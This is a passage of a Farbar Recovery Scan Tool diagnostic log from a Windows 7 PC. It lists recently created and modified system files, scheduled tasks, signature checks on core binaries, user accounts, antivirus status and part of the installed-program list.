2016-10-11 23:30 - 2016-09-09 10:59 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:51 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2016-10-11 23:30 - 2016-09-09 10:51 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2016-10-11 23:30 - 2016-09-09 10:51 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2016-10-11 23:30 - 2016-09-09 10:48 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2016-10-11 23:30 - 2016-09-09 10:47 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2016-10-11 23:30 - 2016-09-09 10:43 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2016-10-11 23:30 - 2016-09-09 10:38 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2016-10-11 23:30 - 2016-09-09 10:38 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2016-10-11 23:30 - 2016-09-09 10:38 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2016-10-11 23:30 - 2016-09-09 10:38 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2016-10-11 23:30 - 2016-09-09 10:37 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:37 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 10:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2016-10-11 23:30 - 2016-09-08 13:34 - 00263680 _____ (Microsoft Corporation) C:\Windows\system32\WebClnt.dll
2016-10-11 23:30 - 2016-09-08 13:34 - 00208896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WebClnt.dll
2016-10-11 23:30 - 2016-09-08 13:34 - 00108544 _____ (Microsoft Corporation) C:\Windows\system32\davclnt.dll
2016-10-11 23:30 - 2016-09-08 13:34 - 00087040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\davclnt.dll
2016-10-11 23:30 - 2016-09-08 07:55 - 00142336 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2016-10-11 23:30 - 2016-09-08 07:55 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2016-10-11 23:30 - 2016-08-16 11:47 - 00419640 _____ C:\Windows\SysWOW64\locale.nls
2016-10-11 23:30 - 2016-08-16 11:47 - 00419640 _____ C:\Windows\system32\locale.nls
2016-10-11 23:30 - 2016-08-12 10:02 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2016-10-11 23:30 - 2016-08-12 10:02 - 12574720 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2016-10-11 23:30 - 2016-08-12 10:02 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2016-10-11 23:30 - 2016-08-12 10:02 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2016-10-11 23:30 - 2016-08-12 10:02 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2016-10-11 23:30 - 2016-08-12 09:47 - 12574208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2016-10-11 23:30 - 2016-08-12 09:47 - 11410432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2016-10-11 23:30 - 2016-08-12 09:31 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2016-10-11 23:30 - 2016-08-12 09:31 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2016-10-11 23:30 - 2016-08-12 09:31 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2016-10-11 23:30 - 2016-08-12 09:26 - 00461312 _____ (Microsoft Corporation) C:\Windows\system32\scavengeui.dll
2016-10-11 23:30 - 2016-08-06 08:31 - 02023424 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2016-10-11 23:30 - 2016-08-06 08:31 - 00347136 _____ (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll
2016-10-11 23:30 - 2016-08-06 08:31 - 00310784 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2016-10-11 23:30 - 2016-08-06 08:31 - 00182272 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll
2016-10-11 23:30 - 2016-08-06 08:31 - 00054272 _____ (Microsoft Corporation) C:\Windows\system32\WsmRes.dll
2016-10-11 23:30 - 2016-08-06 08:31 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\wsmplpxy.dll
2016-10-11 23:30 - 2016-08-06 08:15 - 01178112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2016-10-11 23:30 - 2016-08-06 08:15 - 00249344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManMigrationPlugin.dll
2016-10-11 23:30 - 2016-08-06 08:15 - 00214016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2016-10-11 23:30 - 2016-08-06 08:15 - 00146944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll
2016-10-11 23:30 - 2016-08-06 08:15 - 00054272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmRes.dll
2016-10-11 23:30 - 2016-08-06 08:01 - 00266752 _____ (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe
2016-10-11 23:30 - 2016-08-06 08:01 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\wsmprovhost.exe
2016-10-11 23:30 - 2016-08-06 07:53 - 00199168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManHTTPConfig.exe
2016-10-11 23:30 - 2016-08-06 07:53 - 00012288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsmprovhost.exe
2016-10-11 23:30 - 2016-08-06 07:53 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsmplpxy.dll
2016-10-11 23:30 - 2016-07-22 07:58 - 00142336 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe
2016-10-11 23:30 - 2016-07-22 07:51 - 00123904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\poqexec.exe
2016-10-11 23:30 - 2016-06-14 10:21 - 00094440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys
2016-10-11 23:30 - 2016-06-14 10:16 - 04121600 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 01573888 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 01483264 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 01068544 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00680448 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00632320 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00499712 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00433152 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00295936 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00190976 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00081920 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00037376 _____ (Microsoft Corporation) C:\Windows\system32\pcadm.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msmmsp.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00008704 _____ (Microsoft Corporation) C:\Windows\system32\pcaevts.dll
2016-10-11 23:30 - 2016-06-14 10:16 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2016-10-11 23:30 - 2016-06-14 10:11 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2016-10-11 23:30 - 2016-06-14 08:21 - 03209216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 01176064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00442368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00195072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2016-10-11 23:30 - 2016-06-14 08:21 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2016-10-11 23:30 - 2016-06-14 08:15 - 00125952 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2016-10-11 23:30 - 2016-06-14 08:15 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2016-10-11 23:30 - 2016-06-14 08:15 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2016-10-11 23:30 - 2016-06-14 08:05 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2016-10-11 23:30 - 2016-06-14 08:05 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2016-10-11 23:30 - 2016-06-14 08:00 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\pcawrk.exe
2016-10-11 23:30 - 2016-06-14 08:00 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\pcalua.exe
2016-10-10 11:30 - 2016-10-10 11:30 - 00074352 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-stable.sys
2016-10-10 11:30 - 2016-10-10 11:30 - 00074352 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-dev.sys
2016-10-10 11:30 - 2016-10-10 11:30 - 00074352 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-canary.sys
2016-10-10 11:30 - 2016-10-10 11:30 - 00038000 _____ (Dropbox, Inc.) C:\Windows\system32\DbxSvc.exe
2016-09-20 13:35 - 2016-08-05 08:30 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2016-09-20 13:35 - 2016-08-05 08:13 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-19 19:05 - 2016-04-07 22:00 - 00000904 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job
2016-10-19 18:42 - 2015-11-11 16:34 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-10-19 18:32 - 2014-05-09 19:43 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-10-19 16:24 - 2016-07-12 21:41 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-10-19 16:13 - 2009-07-13 21:45 - 00015328 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-10-19 16:13 - 2009-07-13 21:45 - 00015328 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-10-19 16:11 - 2009-07-13 22:13 - 00889990 _____ C:\Windows\system32\PerfStringBackup.INI
2016-10-19 16:11 - 2009-07-13 20:20 - 00000000 ____D C:\Windows\inf
2016-10-19 16:06 - 2015-07-19 19:31 - 00000000 ____D C:\Users\King\AppData\Roaming\obs-studio
2016-10-19 16:05 - 2016-04-07 22:05 - 00000000 ___RD C:\Users\King\Dropbox
2016-10-19 16:05 - 2016-04-07 22:00 - 00000900 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job
2016-10-19 16:05 - 2014-05-09 19:43 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-10-19 16:05 - 2009-07-13 22:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-10-19 16:00 - 2015-02-02 19:43 - 00000000 ____D C:\Users\King\AppData\Local\Oculus
2016-10-19 07:55 - 2016-04-11 04:12 - 00001080 _____ C:\Windows\system32\settingsbkup.sfm
2016-10-19 07:55 - 2016-04-11 04:12 - 00001080 _____ C:\Windows\system32\settings.sfm
2016-10-19 07:55 - 2016-04-09 22:08 - 00061352 _____ C:\Windows\system32\BMXStateBkp-{00000008-00000000-00000001-00001102-00000005-00311102}.rfx
2016-10-19 07:55 - 2016-04-09 22:08 - 00061352 _____ C:\Windows\system32\BMXState-{00000008-00000000-00000001-00001102-00000005-00311102}.rfx
2016-10-19 07:55 - 2016-04-09 22:08 - 00000788 _____ C:\Windows\system32\DVCState-{00000008-00000000-00000001-00001102-00000005-00311102}.rfx
2016-10-19 00:34 - 2013-10-04 15:52 - 00000000 ____D C:\Users\King\AppData\Roaming\foobar2000
2016-10-18 21:13 - 2014-12-06 03:35 - 00003918 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{3E7BF249-1222-4D5D-AE4D-2229F3700048}
2016-10-16 21:44 - 2014-06-02 19:04 - 00000000 ____D C:\Users\King\AppData\Local\CrashDumps
2016-10-16 16:17 - 2014-05-15 15:45 - 00000000 ____D C:\Users\King\Documents\My PSP Files
2016-10-14 20:30 - 2013-12-09 21:18 - 00000000 ____D C:\Users\King\AppData\Roaming\Audacity
2016-10-13 14:55 - 2016-04-07 22:00 - 00000000 ____D C:\Program Files (x86)\Dropbox
2016-10-12 03:49 - 2009-07-13 20:20 - 00000000 ____D C:\Windows\rescache
2016-10-12 03:24 - 2009-07-13 21:45 - 00291776 _____ C:\Windows\system32\FNTCACHE.DAT
2016-10-12 03:23 - 2014-05-30 03:03 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2016-10-12 03:23 - 2014-05-30 03:03 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-10-12 03:21 - 2009-07-13 20:20 - 00000000 ____D C:\Windows\SysWOW64\Dism
2016-10-12 03:21 - 2009-07-13 20:20 - 00000000 ____D C:\Windows\system32\Dism
2016-10-12 03:06 - 2014-05-10 12:45 - 00000000 ____D C:\Windows\system32\MRT
2016-10-12 03:01 - 2014-05-30 03:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-10-12 03:01 - 2014-05-10 12:45 - 143495576 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-10-10 14:27 - 2014-05-23 00:46 - 00000426 _____ C:\Windows\BRWMARK.INI
2016-10-06 16:59 - 2014-05-30 23:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Snaz
2016-10-03 14:19 - 2014-05-09 19:43 - 00002205 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-09-30 12:08 - 2015-08-25 00:22 - 00000000 ____D C:\Users\King\AppData\Local\Dropbox
2016-09-28 03:00 - 2014-05-28 00:15 - 00002127 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Security Essentials.lnk
2016-09-28 03:00 - 2014-05-28 00:15 - 00001945 _____ C:\Windows\epplauncher.mif
2016-09-28 03:00 - 2014-05-28 00:15 - 00000000 ____D C:\Program Files\Microsoft Security Client
2016-09-28 03:00 - 2014-05-28 00:15 - 00000000 ____D C:\Program Files (x86)\Microsoft Security Client
2016-09-26 13:18 - 2015-10-18 21:32 - 00002283 _____ C:\Users\King\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Logos Bible Software.lnk
2016-09-26 13:18 - 2014-07-30 17:38 - 00000000 ____D C:\Users\King\AppData\Local\Logos5

==================== Files in the root of some directories =======

2014-11-05 09:24 - 2015-07-04 00:11 - 0000296 _____ () C:\Users\King\AppData\Roaming\BreakingPoint_Login.ini
2014-11-05 09:50 - 2015-07-04 00:12 - 0001418 _____ () C:\Users\King\AppData\Roaming\BreakingPoint_Options.ini
2015-02-03 01:09 - 2015-02-03 01:09 - 0088949 _____ () C:\Users\King\AppData\Roaming\Exception Minidump (2015-02-03 08.09.53).mdmp
2015-02-03 01:09 - 2015-02-03 01:09 - 0013570 _____ () C:\Users\King\AppData\Roaming\Exception Report (2015-02-03 08.09.53).txt
2016-03-21 20:18 - 2016-03-21 20:18 - 0000055 _____ () C:\Users\King\AppData\Roaming\MouseServer.ini
2014-06-01 22:41 - 2015-08-25 10:28 - 0102188 _____ () C:\Users\King\AppData\Local\ars.cache
2014-06-01 22:41 - 2015-08-25 10:28 - 0241401 _____ () C:\Users\King\AppData\Local\census.cache
2015-12-05 21:32 - 2015-12-07 23:42 - 1065984 _____ () C:\Users\King\AppData\Local\file__0.localstorage
2014-06-01 22:29 - 2014-06-01 22:29 - 0000036 _____ () C:\Users\King\AppData\Local\housecall.guid.cache
2014-07-27 20:01 - 2014-07-27 20:07 - 209242615 _____ () C:\Users\King\AppData\Local\Logos4.rar
2014-07-27 20:30 - 2014-07-27 20:30 - 0388254 _____ () C:\Users\King\AppData\Local\Logos5.rar
2016-08-03 19:54 - 2016-08-03 19:54 - 0003846 _____ () C:\Users\King\AppData\Local\recently-used.xbel
2014-06-03 18:33 - 2014-08-31 12:37 - 0007638 _____ () C:\Users\King\AppData\Local\Resmon.ResmonCfg
2014-05-09 19:29 - 2014-05-09 19:29 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-10-15 00:50

==================== End of FRST.txt ============================

Addition.txt

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 17-10-2016
Ran by King (19-10-2016 19:20:29)
Running from C:\Users\King\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2014-05-10 02:00:45)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1771700083-1338792134-2885675772-500 - Administrator - Disabled)
ASPNET (S-1-5-21-1771700083-1338792134-2885675772-1009 - Limited - Enabled)
Guest (S-1-5-21-1771700083-1338792134-2885675772-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1771700083-1338792134-2885675772-1002 - Limited - Enabled)
King (S-1-5-21-1771700083-1338792134-2885675772-1001 - Administrator - Enabled) => C:\Users\King

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {71A27EC9-3DA6-45FC-60A7-004F623C6189}
AS: Microsoft Security Essentials (Enabled - Up to date) {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\uTorrent) (Version: 3.4.3.40298 - BitTorrent Inc.)
Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.306 - Adobe Systems Incorporated)
Adobe Flash Player 22 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 22.0.0.209 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.09) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.09 - Adobe Systems Incorporated)
Alien: Isolation (HKLM-x32\...\Steam App 214490) (Version:  - Creative Assembly)
Allegorithmic Bitmap2Material 3.0.2 Trial (HKLM-x32\...\bitmap2material_3_x) (Version: 3.0.2 build 14714 (2014-11-13) - Allegorithmic)
altPUG (HKLM-x32\...\{4FC41018-ABBF-47A0-B917-2DA88C04DA7D}) (Version: 1.2 - altPUG LLC)
Application Insights Tools for Visual Studio 2015 (x32 Version: 3.3 - Microsoft Corporation) Hidden
Arma 2 (HKLM-x32\...\Steam App 33900) (Version:  - Bohemia Interactive)
Arma 2: British Armed Forces (HKLM-x32\...\Steam App 65700) (Version:  - Bohemia Interactive)
